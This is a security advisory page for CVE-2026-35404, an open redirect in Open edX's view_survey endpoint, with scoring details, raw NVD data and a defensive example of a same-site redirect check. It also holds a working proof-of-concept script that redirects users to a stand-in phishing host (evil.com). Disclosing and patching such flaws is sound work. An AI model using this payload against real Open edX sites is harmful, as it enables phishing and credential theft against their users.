Security Vulnerability Report
CVE-2026-35404 CVSS 4.7 MEDIUM

CVE-2026-35404

Published: 2026-04-06 22:16:21
Last Modified: 2026-05-11 18:16:32

Description

Open edX Platform enables the authoring and delivery of online learning at any scale. The view_survey endpoint accepts a redirect_url GET parameter that is passed directly to HttpResponseRedirect() without any URL validation. When a non-existent survey name is provided, the server issues an immediate HTTP 302 redirect to the attacker-controlled URL. Additionally, the same unvalidated URL is embedded in a hidden form field and returned in a JSON response after form submission, where client-side JavaScript performs location.href = url. This enables phishing and credential theft attacks against authenticated Open edX users. This vulnerability is fixed with commit 76462f1e5fa9b37d2621ad7ad19514b403908970.
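The bug described above is the classic open-redirect shape: a caller-supplied URL goes straight into a redirect (and, here, also into a hidden form field and a JSON response that the browser turns into `location.href = url`). The block below is an added example, not the project's code or the fix in commit 76462f1e5fa9b37d2621ad7ad19514b403908970: it shows the vulnerable shape beside a hardened variant that only honours same-site targets. The host check reimplements, without Django, the logic of `django.utils.http.url_has_allowed_host_and_scheme()`; in a real Django view call that function with `allowed_hosts={request.get_host()}` and `require_https=request.is_secure()`. The hostname `learn.example.edu`, the fallback path `/`, and the function names are illustrative assumptions.

```python
"""Added example (not Open edX code): an open redirect of the kind described
in CVE-2026-35404, beside a same-site check that closes it. The check mirrors
django.utils.http.url_has_allowed_host_and_scheme() so it runs without Django;
hostnames, defaults and view names are assumptions for illustration."""
import unicodedata
from urllib.parse import urlsplit


def _host_and_scheme_ok(url, allowed_hosts, require_https):
    # Chrome treats a URL with three leading slashes as absolute, while
    # urlsplit() does not; treat such URLs as unsafe.
    if url.startswith("///"):
        return False
    try:
        parts = urlsplit(url)
    except ValueError:  # e.g. a malformed IPv6 literal
        return False
    # A scheme with no host ("http:evil.com", "javascript:alert(1)") is never
    # a same-site path, and a browser may still read a host out of it.
    if parts.scheme and not parts.netloc:
        return False
    # Some browsers ignore leading control characters, which could turn
    # "\x01//evil.com" into a scheme-relative URL.
    if unicodedata.category(url[0])[0] == "C":
        return False
    scheme = parts.scheme
    if parts.netloc and not scheme:
        scheme = "http"  # "//evil.com/x" is scheme-relative, i.e. http(s)
    valid_schemes = {"https"} if require_https else {"http", "https"}
    return (not parts.netloc or parts.netloc in allowed_hosts) and (
        not scheme or scheme in valid_schemes
    )


def is_safe_redirect_url(url, allowed_hosts, require_https=False):
    """True only for relative paths or absolute URLs on an allowed host."""
    if url is not None:
        url = url.strip()
    if not url:
        return False
    allowed_hosts = set(allowed_hosts)
    # Browsers treat "\" like "/" in paths, so "/\evil.com" becomes
    # "//evil.com"; both spellings must pass the check.
    return _host_and_scheme_ok(url, allowed_hosts, require_https) and \
        _host_and_scheme_ok(url.replace("\\", "/"), allowed_hosts, require_https)


def vulnerable_view_survey(params):
    """Shape of the bug in the advisory: the GET parameter is passed straight
    to the redirect (HttpResponseRedirect(redirect_url) in Django).
    Returns a dict standing in for the HTTP response."""
    return {"status": 302, "location": params.get("redirect_url", "/")}


def hardened_view_survey(params, request_host, request_is_secure=True, default="/"):
    """Same view with the check applied; unsafe targets fall back to a fixed
    same-site default (assumed "/" here). The validated value is also what
    must go into the hidden form field and the JSON response, because the
    client's location.href = url performs no check of its own."""
    target = params.get("redirect_url", "")
    if not is_safe_redirect_url(target, {request_host}, require_https=request_is_secure):
        target = default
    return {"status": 302, "location": target}


if __name__ == "__main__":
    host = "learn.example.edu"  # assumed deployment hostname
    probes = ["/courses", "http://evil.com/phishing", "//evil.com/phishing",
              "/\\evil.com", "javascript:alert(1)",
              "https://learn.example.edu@evil.com/", "https://learn.example.edu/courses"]
    for url in probes:
        vuln = vulnerable_view_survey({"redirect_url": url})["location"]
        safe = hardened_view_survey({"redirect_url": url}, host)["location"]
        print(f"{url!r:42} vulnerable -> {vuln!r:42} hardened -> {safe!r}")
```

The `"/\evil.com"` and `"//evil.com"` cases are the ones a naive "starts with a slash" filter misses; the userinfo case (`learn.example.edu@evil.com`) is the one a "contains our hostname" filter misses. An exact host match against the request's own host, applied before the value is stored anywhere, covers both.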

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
Weakness
CWE-601 (URL Redirection to Untrusted Site)

The 4.7 score above is the secondary (GitHub) assessment. The NVD primary assessment in the raw JSON below rates the same issue 6.1 MEDIUM with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N; the two differ only in whether a redirect to an attacker-controlled site counts as a low integrity impact. Both agree that no privileges are required, that a victim must click the crafted link (UI:R), and that the impact lands on the user's browser rather than the Open edX server (S:C).

Configurations (Affected Products)

cpe:2.3:a:openedx:openedx:*:*:*:*:*:*:*:* - VULNERABLE
Open edX Platform before commit 76462f1e5fa9b37d2621ad7ad19514b403908970 (NVD match criteria: versions up to and including 2026-04-02)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2026-35404: Open edX Platform Open Redirect
import requests


def exploit_open_redirect(target_host, redirect_url, cookies=None):
    """
    Exploits the open redirect vulnerability in the view_survey endpoint.

    The endpoint path and the `name` parameter below are as given in this PoC;
    verify them against the survey URLconf of the target deployment before
    trusting a negative result. The advisory describes the attack against
    authenticated users, so if the server answers with a redirect to its login
    page, retry with the victim's session cookies (e.g. {"sessionid": "..."}).
    """
    # Construct the malicious URL
    endpoint = f"{target_host}/survey/view_survey"
    params = {
        "name": "non_existent_survey",  # Triggers the 302 redirect logic
        "redirect_url": redirect_url,
    }
    print(f"[*] Sending request to: {endpoint}")
    print(f"[*] Payload: redirect_url={redirect_url}")
    try:
        # Send request without following redirects to capture the Location header
        response = requests.get(endpoint, params=params, cookies=cookies,
                                allow_redirects=False, timeout=10)
        if response.status_code == 302:
            location = response.headers.get("Location")
            if location == redirect_url:
                print(f"[+] Vulnerability Confirmed! Server redirects to: {location}")
                return True
            # A Location pointing at /login usually means the view requires a session
            print(f"[-] Unexpected redirect to: {location}")
        else:
            print(f"[-] Expected 302 Redirect, got status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")
    return False


if __name__ == "__main__":
    # Example usage
    target = "http://localhost:8000"
    malicious_site = "http://evil.com/phishing"
    exploit_open_redirect(target, malicious_site)
```

References

Patch: https://github.com/openedx/openedx-platform/commit/76462f1e5fa9b37d2621ad7ad19514b403908970
Vendor Advisory (GHSA-2843-x998-f8r2): https://github.com/openedx/openedx-platform/security/advisories/GHSA-2843-x998-f8r2
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35404", "sourceIdentifier": "[email protected]", "published": "2026-04-06T22:16:21.360", "lastModified": "2026-05-11T18:16:32.343", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open edX Platform enables the authoring and delivery of online learning at any scale. The view_survey endpoint accepts a redirect_url GET parameter that is passed directly to HttpResponseRedirect() without any URL validation. When a non-existent survey name is provided, the server issues an immediate HTTP 302 redirect to the attacker-controlled URL. Additionally, the same unvalidated URL is embedded in a hidden form field and returned in a JSON response after form submission, where client-side JavaScript performs location.href = url. This enables phishing and credential theft attacks against authenticated Open edX users. This vulnerability is fixed with commit 76462f1e5fa9b37d2621ad7ad19514b403908970."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": 
[{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openedx:openedx:*:*:*:*:*:*:*:*", "versionEndIncluding": "2026-04-02", "matchCriteriaId": "06A17A40-548D-40D0-BD7F-CC30B7EA25DA"}]}]}], "references": [{"url": "https://github.com/openedx/openedx-platform/commit/76462f1e5fa9b37d2621ad7ad19514b403908970", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openedx/openedx-platform/security/advisories/GHSA-2843-x998-f8r2", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}